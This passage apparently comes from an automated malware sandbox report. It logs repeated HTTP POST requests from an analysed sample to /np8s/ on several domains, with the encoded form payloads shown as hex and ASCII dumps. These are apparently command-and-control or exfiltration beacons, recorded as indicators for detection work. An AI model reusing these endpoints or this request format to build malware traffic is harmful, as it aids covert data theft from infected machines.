39 48 75 58 2d 35 31 7a 36 37 6c 55 6d 6c 6b 69 52 67 75 76 70 39 37 34 48 32 56 6f 77 7a 32 34 71 6c 41 7e 65 33 48 73 70 39 48 7a 63 64 49 59 41 67 50 4f 38 66 77 48 61 46 32 42 37 7a 76 64 35 6c 6b 75 38 48 78 47 70 4e 42 4b 36 59 50 67 70 30 4b 45 51 57 57 39 77 50 31 64 71 75 77 6c 5a 4d 6d 56 30 49 34 28 6e 50 56 5a 4d 44 69 77 47 43 76 6d 32 6a 54 55 34 73 58 49 4c 66 53 67 7a 65 44 57 64 64 5f 71 6a 48 73 44 36 6b 42 36 33 61 53 35 73 53 37 4d 4e 31 48 7e 70 31 31 78 67 6d 7a 56 56 33 69 6c 6f 43 5f 7a 63 64 62 41 41 48 57 41 35 46 61 4a 75 59 46 31 6a 72 65 68 30 58 4e 4d 79 67 78 4b 31 77 4c 5a 66 42 53 4f 2d 6e 79 5a 76 43 56 6e 37 43 54 6f 58 38 59 78 75 71 33 67 50 63 36 70 75 55 4a 6b 46 45 52 48 53 56 6b 52 70 44 51 4a 68 59 73 66 76 4c 54 61 54 50 75 75 44 36 71 32 62 45 49 32 7a 30 6c 31 6b 56 57 61 39 70 73 72 65 69 61 74 6e 67 59 74 59 33 47 6b 33 4d 34 52 71 30 2d 28 32 47 47 74 79 31 50 69 35 4d 68 51 4f 76 30 6c 4d 57 44 56 6a 50 52 78 61 74 5a 58 34 48 72 57 4a 54 36 69 65 43 75 62 74 49 4c 4f 78 49 36 41 65 53 47 48 70 39 6d 66 49 52 49 7e 46 73 6c 41 75 78 39 57 48 70 63 67 36 41 47 5a 6c 41 42 74 34 39 64 59 57 77 75 39 39 39 4d 28 6f 4f 74 38 47 71 49 6e 42 67 59 30 73 68 78 6e 54 70 4b 35 39 4a 76 39 7a 55 72 6b 64 34 46 6c 61 54 30 5a 4f 62 57 58 57 48 64 5a 68 59 46 57 5a 62 66 4f 59 70 39 38 56 43 74 67 73 38 52 39 5a 7a 4e 4d 64 57 4e 6d 4f 32 34 33 6d 7a 69 50 6c 5a 78 58 67 4e 76 59 32 76 6c 37 6c 6b 79 32 4a 55 35 6b 50 79 4b 4f 41 44 6a 67 71 43 31 49 6d 7a 47 4b 2d 76 75 63 37 56 62 79
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.waermark.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.waermark.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.waermark.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 68 72 35 36 33 77 7a 61 76 58 56 62 7a 43 70 4e 64 64 43 56 55 72 62 55 71 55 4f 50 4e 78 55 6d 38 4f 62 49 79 55 76 6e 65 68 36 55 32 50 72 35 51 4b 73 62 6b 42 77 6d 41 41 61 32 33 58 53 2d 28 56 6b 53 72 30 34 33 4a 48 6d 6c 4f 79 6b 4c 79 71 48 32 64 71 41 2d 78 44 64 65 78 78 6a 64 51 67 41 48 35 39 56 69 44 6c 69 66 35 64 72 38 7a 66 64 51 4d 41 56 66 41 4b 71 36 64 30 57 6f 55 76 46 6d 35 62 67 79 46 35 34 70 74 50 51 39 4e 4f 28 5f 7a 58 41 32 63 74 44 49 65 53 4b 35 4c 69 42 53 34 7a 62 56 64 52 44 6c 41 34 6d 43 6f 32 43 73 4d 33 74 43 58 64 7a 4b 6a 39 56 4c 61 46 39 51 68 69 74 71 73 74 51 53 49 78 39 54 35 47 4c 65 74 4f 72 52 63 59 6e 65 45 38 72 45 33 57 46 42 67 5a 44 33 67 75 44 44 73 71 30 73 51 67 6c 58 73 2d 68 6c 4d 50 37 6f 7e 41 68 51 65 49 4b 6d 51 35 4a 50 53 41 33 4b 4f 70 6a 61 6e 54 70 4f 73 58 28 32 4f 52 52 56 66 48 79 74 74 46 57 55 7e 49 28 70 6a 69 55 6d 7a 5f 6e 67 6d 39 4c 7a 39 74 48 56 5a 35 53 66 28 67 5a 4a 35 61 4a 30 76 6f 79 56 48 54 4a 68 77 46 70 53 6c 39 42 4d 6d 62 52 66 77 54 41 58 62 49 49 37 39 57 75 35 79 44 74 62 42 6d 72 72 6e 4a 7e 58 7e 54 4e 62 4f 38 77 31 35 43 66 75 45 62 67 53 58 4f 49 2d 38 51 63 31 79 66 6e 54 43 64 56 66 6d 48 4e 45 6f 54 63 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=hr563wzavXVbzCpNddCVUrbUqUOPNxUm8ObIyUvneh6U2Pr5QKsbkBwmAAa23XS-(VkSr043JHmlOykLyqH2dqA-xDdexxjdQgAH59ViDlif5dr8zfdQMAVfAKq6d0WoUvFm5bgyF54ptPQ9NO(_zXA2ctDIeSK5LiBS4zbVdRDlA4mCo2CsM3tCXdzKj9VLaF9QhitqstQSIx9T5GLetOrRcYneE8rE3WFBgZD3guDDsq0sQglXs-hlMP7o~AhQeIKmQ5JPSA3KOpjanTpOsX(2ORRVfHyttFWU~I(pjiUmz_ngm9Lz9tHVZ5Sf(gZJ5aJ0voyVHTJhwFpSl9BMmbRfwTAXbII79Wu5yDtbBmrrnJ~X~TNbO8w15CfuEbgSXOI-8Qc1yfnTCdVfmHNEoTc.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.waermark.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.waermark.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.waermark.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 68 72 35 36 33 31 61 52 79 33 34 46 39 79 31 75 63 50 79 42 42 4c 4c 53 6f 45 61 41 49 78 35 2d 34 36 57 35 76 45 28 61 4d 51 43 4b 79 5f 32 5a 55 4c 30 35 6b 46 34 4c 62 6d 43 71 7a 79 4b 5f 28 56 73 4e 72 30 38 33 4b 48 4f 31 4f 51 63 78 31 49 28 31 63 4b 41 4f 77 44 64 4d 31 30 37 77 51 67 30 31 35 39 74 79 44 57 32 66 35 37 6e 38 33 75 64 74 42 41 56 64 4e 71 61 2d 51 55 71 66 55 72 70 45 35 5a 6b 79 43 4a 38 70 69 50 67 79 47 74 6e 38 36 6e 41 4a 4b 64 43 49 46 69 48 49 4c 69 45 42 34 79 33 56 49 79 33 6c 42 70 4b 43 74 46 61 72 48 6e 74 62 47 4e 7a 39 70 64 70 61 61 46 68 63 68 67 41 58 73 38 6b 53 4a 42 39 57 38 51 4c 57 38 70 66 47 51 34 54 35 45 38 33 68 33 44 64 4a 67 59 76 62 67 64 62 34 6f 49 64 4a 51 69 6f 5a 75 65 68 70 47 76 37 4e 7e 41 68 67 65 49 4c 48 51 36 52 50 53 48 4c 4b 50 49 54 61 77 54 70 52 78 48 28 7a 47 78 51 4c 62 43 71 30 74 46 65 6c 7e 4b 28 58 6a 55 41 6d 79 74 66 67 32 73 4c 77 6f 4e 48 58 57 5a 54 61 75 51 5a 47 35 61 49 52 76 71 62 4b 48 43 5a 68 32 55 70 53 70 37 31 4d 68 72 52 66 36 7a 41 52 56 5a 31 6d 39 57 32 39 79 43 64 6c 42 52 62 72 69 50 71 58 35 79 4e 62 49 4d 77 31 7a 53 65 51 43 4c 4a 45 54 65 4e 66 37 52 77 68 6e 75 54 67 4a 50 45 44 77 46 4e 6b 33 58 76 63 4d 4f 5a 34 34 4b 45 5f 62 4e 71 37 78 54 73 34 6d 6d 36 70 6f 41 43 79 56 36 7e 6e 54 56 62 47 35 5a 66 4c 44 5a 36 31 67 63 38 71 5a 51 6e 36 33 72 54 4b 43 49 31 32 67 62 46 61 64 61 33 53 72 64 71 45 54 79 42 49 6b 4d 6f 64 4b 32 6a 73 6d 75 45 4d 79 4a 49 78 5a 63 58 43 57 6f 70 35 78 70 33 4e 6f 62 73 2d 4b 37 43 34 4f 6b 31 50 62 63 58 2d 64 7a 65 70 52 33 6c 53 72 52 57 4c 71 72 4e 2d 77 4d 42 38 45 59 72 63 5a 63 44 55 34 6d 35 73 62 54 73 48 72 42 57 34 53 38 44 6b 43 38 53 62 43 30 44 75 4e 7a 67 43 4d 64 54 78 6c 42 48 47 77 75 51 6c 6a 50 34 6c 76 76 6e 48 6b 55 53 4f 6d 59 65 75 61 6d 6a 49 66 32 66 4a 47 79 56 57 79 41 6e 59 66 47 4c 46 4e 74 30 76 49 33 6c 50 4e 35 44 67 57 6c 74 76 53 4e 49 47 61 46 72 6d 64 46 30 70 55 62 52 68 31 4e 45 7a 67 47 34 66 48 75 42 4b 6f 5a 28 79 4b 61 73 66 4d 46 68 77 4d 78 78 44 67 6e 42 69 46 4c 74 70 39 38 6f 6a 70 37 46 32 51 54 59 73 56 64 6c 48 6b 6f 6c 44 66 4b 32 74 63 54 31 58 4c 79 4e 4e 59 59 4c 64 32 78 6f 70 6c 61 57 72 34 6d 48 72 47 30 56 45 55 51 74 44 49 69 42 7a 50 30 6a 4c 4c 39 73 4b 58 4e 31 62 44 39 76 64 54 71 77 53 70 38 51 7a 4e 57 48 59 4c 6f 42 52 72 4f 70 79 75 36 57 4e 71 41 30 77 4c 5a 41 31 52 71 7a 38 6b 79 4a 39 7a 53 72 33 79 48 30 77 30 74 30 54 38 71 37 38 59 62 46 4b 43 7a 62 49 4d 59 38 37 43 6d 38 43 4a 62 5a 43 59 63 35 45 47 45 74 6d 67 4b 59
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.vitality-patients.onlineConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.vitality-patients.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vitality-patients.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 65 50 6a 41 5a 74 35 61 58 43 5a 61 6b 4b 51 6b 70 71 44 4e 76 39 61 41 47 51 5a 50 4b 64 71 38 52 53 78 34 56 52 55 46 62 48 46 49 6a 31 76 34 66 77 64 59 31 78 47 67 45 76 6a 5f 37 78 54 48 45 6b 57 62 59 4d 6a 49 50 7a 57 37 74 66 78 73 61 50 6c 6a 38 65 47 31 66 45 41 50 53 66 7a 67 43 61 5a 76 64 6c 6a 77 35 45 68 70 61 4b 46 30 34 6b 6a 57 62 71 6d 53 63 49 54 6b 28 69 69 37 28 4a 77 6b 6d 48 78 61 41 46 69 37 53 57 48 70 62 79 53 39 34 79 70 61 49 58 4d 77 65 6d 45 6c 71 72 33 71 52 6b 6f 72 51 4d 55 47 49 58 61 6e 59 66 4e 46 4f 64 32 57 43 5a 46 52 38 5a 6d 33 58 71 54 30 36 4e 66 48 7e 34 4e 45 79 50 34 37 46 45 4a 68 56 71 62 47 78 6a 4a 72 6c 6b 43 32 6b 53 5a 46 49 33 49 34 56 35 6e 49 39 78 64 52 33 49 73 77 41 73 64 57 79 72 39 67 65 4f 5a 6f 73 53 64 65 32 6d 57 67 6c 42 44 6b 41 6d 4f 31 67 4b 6e 6a 30 33 32 2d 79 48 56 78 30 70 47 37 7a 37 68 4d 46 77 7e 54 41 74 77 33 56 55 31 66 7a 67 4a 78 67 43 37 65 6e 35 56 63 63 53 7a 36 52 63 55 6c 36 47 4b 43 6f 61 7a 5f 47 78 4e 4d 34 6a 64 70 72 44 7e 31 75 71 56 71 61 7a 5a 44 34 41 42 69 50 37 72 4d 54 55 4b 30 7e 4e 54 34 62 67 68 66 53 2d 58 35 68 53 51 6f 35 4e 44 69 69 44 66 35 63 4f 31 38 46 4e 55 4b 43 68 34 6b 28 58 4c 64 48 5a 49 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=ePjAZt5aXCZakKQkpqDNv9aAGQZPKdq8RSx4VRUFbHFIj1v4fwdY1xGgEvj_7xTHEkWbYMjIPzW7tfxsaPlj8eG1fEAPSfzgCaZvdljw5EhpaKF04kjWbqmScITk(ii7(JwkmHxaAFi7SWHpbyS94ypaIXMwemElqr3qRkorQMUGIXanYfNFOd2WCZFR8Zm3XqT06NfH~4NEyP47FEJhVqbGxjJrlkC2kSZFI3I4V5nI9xdR3IswAsdWyr9geOZosSde2mWglBDkAmO1gKnj032-yHVx0pG7z7hMFw~TAtw3VU1fzgJxgC7en5VccSz6RcUl6GKCoaz_GxNM4jdprD~1uqVqazZD4ABiP7rMTUK0~NT4bghfS-X5hSQo5NDiiDf5cO18FNUKCh4k(XLdHZI.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.vitality-patients.onlineConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.vitality-patients.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vitality-patients.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 65 50 6a 41 5a 73 46 51 61 54 68 44 7e 4b 63 58 6b 34 43 4d 38 4d 71 47 45 67 64 55 4a 66 75 6a 47 77 49 66 4b 44 4e 7a 61 48 4e 53 77 31 7a 5a 62 7a 73 46 31 7a 75 46 4e 35 7a 37 28 52 66 59 45 67 79 31 59 4d 6e 49 4f 33 54 6d 74 38 5a 4b 61 71 4a 67 78 65 47 4a 65 45 41 73 57 65 28 42 43 62 74 33 64 6c 72 67 7e 30 64 70 62 6f 4e 30 36 6d 4c 42 56 71 6d 49 66 4c 37 43 79 43 75 63 28 4a 35 6a 6d 47 4e 61 41 31 65 37 53 32 58 6d 5a 78 36 2d 31 43 70 6c 4e 58 4e 30 56 47 49 62 71 72 7a 55 52 6d 38 72 51 2d 67 47 4a 45 69 6e 4a 2d 4e 45 46 4e 33 63 47 5a 46 6d 34 5a 37 70 58 75 4c 34 36 4d 62 39 7e 4e 39 45 7a 5f 34 2d 42 58 35 44 52 39 37 64 7a 6a 56 63 6c 6b 66 39 6b 44 45 59 49 32 31 74 44 37 28 6a 68 6e 78 5f 33 4e 31 58 43 4d 64 4e 71 37 39 37 65 4f 5a 59 73 53 64 38 32 6d 6d 67 6c 47 58 6b 42 45 57 31 78 61 6e 73 32 58 32 5f 71 33 56 69 77 6f 37 47 7a 36 4a 63 46 30 75 31 41 64 6b 33 58 47 39 66 69 31 39 79 6f 79 37 63 74 5a 56 47 50 43 7a 4c 52 63 56 49 36 48 4b 73 6f 4a 58 5f 48 67 4e 4d 36 77 31 70 74 7a 7e 31 74 71 56 6f 44 44 56 70 34 41 5a 39 50 5f 6d 37 54 6e 47 30 28 63 7a 34 63 43 4a 66 51 4f 58 35 6f 79 52 6c 7e 76 50 70 70 79 7e 45 4c 2d 5a 4e 61 49 41 4b 4f 7a 45 70 69 6c 6e 68 62 2d 39 4a 66 69 72 65 70 57 28 47 49 48 6a 2d 7a 6f 53 2d 4a 59 61 31 75 33 4f 64 4e 35 72 34 46 51 69 63 48 6f 35 69 77 42 65 6b 4b 52 77 7a 34 59 4f 4a 57 77 45 4a 70 65 4c 46 55 58 6c 61 69 32 62 67 73 35 44 6a 72 61 37 64 36 48 38 69 65 69 47 54 37 46 44 56 32 42 76 48 6b 34 33 36 51 32 36 57 33 4c 35 75 71 4c 58 30 58 79 76 4e 73 4a 7e 49 58 43 74 68 32 33 39 6b 30 58 49 50 79 6b 35 44 52 45 65 4c 76 5f 53 66 78 39 69 75 30 4f 72 65 75 50 58 2d 54 52 4d 51 50 32 43 75 78 53 5a 37 38 33 6f 7a 6b 45 6e 59 35 67 6a 4f 54 37 30 42 79 64 38 6c 30 6b 67 48 75 5f 78 77 54 56 6e 6d 55 35 38 52 77 6b 4b 6f 4f 59 6d 46 43 70 51 7a 4c 72 6b 6f 67 48 55 6e 58 70 78 51 34 33 66 38 78 73 4c 5f 33 55 75 52 6b 49 32 49 67 43 43 34 7a 5f 7e 49 45 31 70 4f 4d 68 6d 31 57 32 62 77 49 65 28 75 4a 31 67 77 72 79 7a 6f 6d 6d 32 47 75 6d 39 37 34 76 52 65 45 64 31 51 73 73 51 48 72 44 59 35 76 34 6b 4b 55 67 39 41 67 45 55 72 76 44 43 39 74 51 34 4f 4f 69 48 32 30 2d 55 4f 28 36 50 77 5a 5a 63 42 6c 41 6e 55 28 77 4e 79 45 47 79 66 4f 47 31 6c 4a 47 62 4e 34 58 50 34 71 46 63 7a 52 48 4a 4c 30 4f 4d 68 74 33 6b 4a 6d 70 50 42 46 4e 4e 79 31 4e 72 63 76 57 65 30 47 4f 72 64 6d 31 6c 72 76 50 72 46 46 4c 48 67 47 63 68 53 53 32 4a 4f 6b 66 41 2d 6d 42 30 31 50 79 57 64 72 4b 6f 50 32 33 6f 4f 37 2d 53 42 50 4f 78 52 50 57 45
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.harmlett.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.harmlett.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.harmlett.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 49 64 53 47 7a 46 72 78 34 73 63 44 6b 31 73 59 6a 6b 28 59 69 47 49 42 77 4a 32 43 77 6a 78 49 61 65 51 73 58 45 31 56 79 30 76 34 58 73 4f 55 35 46 55 55 36 4e 6b 75 35 57 4c 78 38 4d 39 67 62 62 42 58 54 2d 7e 32 67 47 58 35 69 42 48 55 41 68 52 55 75 6f 43 52 47 54 52 6d 6c 32 38 46 61 4c 6b 64 67 6c 32 41 6e 4e 57 31 49 64 35 65 6d 53 51 4f 34 5a 6b 6d 4a 74 50 56 38 71 52 62 6f 6f 36 4b 45 62 38 32 76 58 38 52 43 4a 37 6e 5a 39 64 72 64 6a 52 38 54 47 74 4a 4b 73 57 30 34 62 4c 7a 30 78 61 56 4e 45 6a 5a 37 36 56 51 62 5f 71 6a 51 69 32 31 35 7a 54 66 28 35 5a 77 56 4b 4e 44 79 69 62 7a 4e 4b 54 63 44 33 58 6f 35 6a 46 58 34 74 65 41 7a 31 54 6b 37 7a 64 56 30 74 6c 4b 71 38 71 52 58 32 69 72 28 65 79 76 38 45 50 49 4f 42 42 63 41 4e 54 65 43 52 73 63 66 66 55 66 64 5f 37 49 78 76 75 54 56 30 72 34 64 57 7a 78 4d 50 75 68 55 6f 36 44 67 4f 53 61 77 38 78 7a 64 5f 71 41 67 6c 38 77 5a 48 43 67 41 50 38 62 6d 72 65 5a 48 70 5a 72 76 72 6f 73 71 52 58 50 7e 49 52 57 63 56 73 54 42 36 4d 79 6d 33 61 58 64 78 45 50 5a 61 76 59 73 5a 31 61 74 64 32 64 6b 35 55 6e 39 36 49 72 69 54 74 35 5a 51 30 64 67 65 48 54 38 37 7e 5f 55 44 67 45 4a 36 43 73 75 6a 74 2d 70 42 35 57 44 7a 58 56 41 4e 6b 64 4e 51 38 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=IdSGzFrx4scDk1sYjk(YiGIBwJ2CwjxIaeQsXE1Vy0v4XsOU5FUU6Nku5WLx8M9gbbBXT-~2gGX5iBHUAhRUuoCRGTRml28FaLkdgl2AnNW1Id5emSQO4ZkmJtPV8qRboo6KEb82vX8RCJ7nZ9drdjR8TGtJKsW04bLz0xaVNEjZ76VQb_qjQi215zTf(5ZwVKNDyibzNKTcD3Xo5jFX4teAz1Tk7zdV0tlKq8qRX2ir(eyv8EPIOBBcANTeCRscffUfd_7IxvuTV0r4dWzxMPuhUo6DgOSaw8xzd_qAgl8wZHCgAP8bmreZHpZrvrosqRXP~IRWcVsTB6Mym3aXdxEPZavYsZ1atd2dk5Un96IriTt5ZQ0dgeHT87~_UDgEJ6Csujt-pB5WDzXVANkdNQ8.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.harmlett.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.harmlett.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.harmlett.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 49 64 53 47 7a 46 6e 5a 31 34 74 56 71 46 68 32 69 78 7a 4d 74 53 4d 50 33 35 79 47 28 43 77 51 4e 50 42 58 61 68 4a 42 7a 77 72 2d 54 66 37 62 39 45 63 4d 36 50 38 44 30 46 75 35 35 73 78 68 62 62 49 45 54 5f 4b 32 68 46 57 6d 69 6a 28 79 41 44 35 58 71 49 44 6f 55 44 52 5f 76 69 38 6f 61 4b 51 72 67 6c 7e 51 6d 39 36 31 4a 2d 42 65 76 31 38 48 6e 70 6b 38 53 74 66 4a 79 4b 73 4c 6f 6f 7a 50 45 5a 34 32 75 6e 77 52 54 63 7a 6d 62 36 68 73 55 54 52 35 57 47 73 4a 41 4d 4b 6e 34 62 4f 6d 30 7a 65 56 4f 32 48 5a 34 4f 5a 51 4f 2d 71 67 45 43 32 77 6f 6a 53 64 37 34 6c 68 56 4c 6c 78 79 6a 66 5a 4e 5a 7a 63 44 48 58 70 38 77 6c 31 70 75 48 41 67 6c 4f 30 37 7a 52 38 7a 38 35 43 71 39 48 30 66 67 6e 66 36 38 61 46 38 48 69 64 43 42 41 56 49 74 53 61 43 52 73 57 66 66 55 31 64 5f 4c 49 78 73 7e 54 58 57 7a 34 62 6d 7a 79 44 50 76 72 66 49 36 41 33 2d 65 71 77 39 56 6a 64 2d 7e 71 68 58 4d 77 4c 69 65 67 52 2d 38 55 73 62 65 6c 4c 4a 5a 50 72 72 6f 6a 71 52 57 73 7e 4d 46 47 62 6b 38 54 41 76 67 79 71 31 43 58 62 42 45 50 63 61 76 57 69 35 35 77 74 64 76 56 6b 38 78 61 36 4d 45 72 69 41 6c 35 59 78 30 64 67 75 48 54 36 37 28 53 43 44 41 4a 53 70 62 72 6c 53 74 6d 31 44 42 65 44 54 53 63 55 65 67 35 54 33 35 2d 4e 4a 48 51 41 7a 39 58 68 32 53 43 4f 68 59 73 45 48 6d 5f 71 4a 6b 59 7e 38 43 57 79 66 31 48 42 61 5a 30 4c 61 4e 45 66 55 32 4f 28 44 28 74 54 47 34 34 63 68 7a 35 68 74 33 51 7a 51 61 6f 6a 36 62 59 74 4c 52 66 66 31 77 2d 39 44 6f 50 58 49 7a 73 53 5a 4d 78 70 63 33 58 43 4e 75 44 49 30 50 49 51 4b 68 43 49 33 63 5a 4e 43 7a 62 72 31 51 77 79 47 6e 31 57 61 4d 78 75 5f 69 59 55 4f 59 50 73 53 74 4c 72 30 4d 77 7e 38 28 41 4b 71 46 67 71 48 4a 4e 52 73 46 6a 54 39 5a 46 31 38 4d 33 30 67 39 2d 39 4b 69 79 65 6c 6b 54 7e 66 65 74 76 63 61 75 7a 53 6d 4c 43 55 57 41 37 6f 72 44 63 41 7e 43 6d 4f 4d 49 6d 38 35 63 7a 30 61 37 33 53 47 50 58 5f 48 66 39 46 6f 63 50 2d 59 6b 72 61 28 71 35 77 4c 59 78 54 6f 78 70 6e 75 45 4e 76 48 72 42 58 4d 62 4e 73 56 67 57 6e 7a 35 4a 63 53 65 38 45 47 6c 38 4f 31 39 6b 6e 49 35 72 54 34 66 37 39 56 6e 72 69 31 55 4b 5a 33 52 41 64 4c 5a 4c 5a 63 2d 7a 6f 73 56 6c 47 6b 53 53 54 34 47 61 37 46 59 6d 59 52 59 42 73 53 6d 49 42 63 53 72 71 46 53 78 4c 4b 5a 63 63 28 34 6f 38 33 6e 70 56 50 6d 76 54 43 4e 47 6d 69 56 64 39 38 68 75 4a 36 52 4a 74 37 4e 46 31 46 70 4a 48 71 73 41 63 71 73 39 41 44 6f 4a 31 61 52 49 79 53 33 56 42 58 43 64 6e 67 7a 35 43 56 61 4a 63 4c 55 77 4a 68 6c 57 63 38 38 56 53 41 39 34 75 33 78 75 79 50 67 64 52 46 69 73 42 63 6f 59 44 79 79 67 79 49 53 43 36 59 34 70 77 69
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.waermark.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.waermark.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.waermark.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 68 72 35 36 33 77 7a 61 76 58 56 62 7a 43 70 4e 64 64 43 56 55 72 62 55 71 55 4f 50 4e 78 55 6d 38 4f 62 49 79 55 76 6e 65 68 36 55 32 50 72 35 51 4b 73 62 6b 42 77 6d 41 41 61 32 33 58 53 2d 28 56 6b 53 72 30 34 33 4a 48 6d 6c 4f 79 6b 4c 79 71 48 32 64 71 41 2d 78 44 64 65 78 78 6a 64 51 67 41 48 35 39 56 69 44 6c 69 66 35 64 72 38 7a 66 64 51 4d 41 56 66 41 4b 71 36 64 30 57 6f 55 76 46 6d 35 62 67 79 46 35 34 70 74 50 51 39 4e 4f 28 5f 7a 58 41 32 63 74 44 49 65 53 4b 35 4c 69 42 53 34 7a 62 56 64 52 44 6c 41 34 6d 43 6f 32 43 73 4d 33 74 43 58 64 7a 4b 6a 39 56 4c 61 46 39 51 68 69 74 71 73 74 51 53 49 78 39 54 35 47 4c 65 74 4f 72 52 63 59 6e 65 45 38 72 45 33 57 46 42 67 5a 44 33 67 75 44 44 73 71 30 73 51 67 6c 58 73 2d 68 6c 4d 50 37 6f 7e 41 68 51 65 49 4b 6d 51 35 4a 50 53 41 33 4b 4f 70 6a 61 6e 54 70 4f 73 58 28 32 4f 52 52 56 66 48 79 74 74 46 57 55 7e 49 28 70 6a 69 55 6d 7a 5f 6e 67 6d 39 4c 7a 39 74 48 56 5a 35 53 66 28 67 5a 4a 35 61 4a 30 76 6f 79 56 48 54 4a 68 77 46 70 53 6c 39 42 4d 6d 62 52 66 77 54 41 58 62 49 49 37 39 57 75 35 79 44 74 62 42 6d 72 72 6e 4a 7e 58 7e 54 4e 62 4f 38 77 31 35 43 66 75 45 62 67 53 58 4f 49 2d 38 51 63 31 79 66 6e 54 43 64 56 66 6d 48 4e 45 6f 54 63 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=hr563wzavXVbzCpNddCVUrbUqUOPNxUm8ObIyUvneh6U2Pr5QKsbkBwmAAa23XS-(VkSr043JHmlOykLyqH2dqA-xDdexxjdQgAH59ViDlif5dr8zfdQMAVfAKq6d0WoUvFm5bgyF54ptPQ9NO(_zXA2ctDIeSK5LiBS4zbVdRDlA4mCo2CsM3tCXdzKj9VLaF9QhitqstQSIx9T5GLetOrRcYneE8rE3WFBgZD3guDDsq0sQglXs-hlMP7o~AhQeIKmQ5JPSA3KOpjanTpOsX(2ORRVfHyttFWU~I(pjiUmz_ngm9Lz9tHVZ5Sf(gZJ5aJ0voyVHTJhwFpSl9BMmbRfwTAXbII79Wu5yDtbBmrrnJ~X~TNbO8w15CfuEbgSXOI-8Qc1yfnTCdVfmHNEoTc.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.waermark.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.waermark.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.waermark.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 68 72 35 36 33 31 61 52 79 33 34 46 39 79 31 75 63 50 79 42 42 4c 4c 53 6f 45 61 41 49 78 35 2d 34 36 57 35 76 45 28 61 4d 51 43 4b 79 5f 32 5a 55 4c 30 35 6b 46 34 4c 62 6d 43 71 7a 79 4b 5f 28 56 73 4e 72 30 38 33 4b 48 4f 31 4f 51 63 78 31 49 28 31 63 4b 41 4f 77 44 64 4d 31 30 37 77 51 67 30 31 35 39 74 79 44 57 32 66 35 37 6e 38 33 75 64 74 42 41 56 64 4e 71 61 2d 51 55 71 66 55 72 70 45 35 5a 6b 79 43 4a 38 70 69 50 67 79 47 74 6e 38 36 6e 41 4a 4b 64 43 49 46 69 48 49 4c 69 45 42 34 79 33 56 49 79 33 6c 42 70 4b 43 74 46 61 72 48 6e 74 62 47 4e 7a 39 70 64 70 61 61 46 68 63 68 67 41 58 73 38 6b 53 4a 42 39 57 38 51 4c 57 38 70 66 47 51 34 54 35 45 38 33 68 33 44 64 4a 67 59 76 62 67 64 62 34 6f 49 64 4a 51 69 6f 5a 75 65 68 70 47 76 37 4e 7e 41 68 67 65 49 4c 48 51 36 52 50 53 48 4c 4b 50 49 54 61 77 54 70 52 78 48 28 7a 47 78 51 4c 62 43 71 30 74 46 65 6c 7e 4b 28 58 6a 55 41 6d 79 74 66 67 32 73 4c 77 6f 4e 48 58 57 5a 54 61 75 51 5a 47 35 61 49 52 76 71 62 4b 48 43 5a 68 32 55 70 53 70 37 31 4d 68 72 52 66 36 7a 41 52 56 5a 31 6d 39 57 32 39 79 43 64 6c 42 52 62 72 69 50 71 58 35 79 4e 62 49 4d 77 31 7a 53 65 51 43 4c 4a 45 54 65 4e 66 37 52 77 68 6e 75 54 67 4a 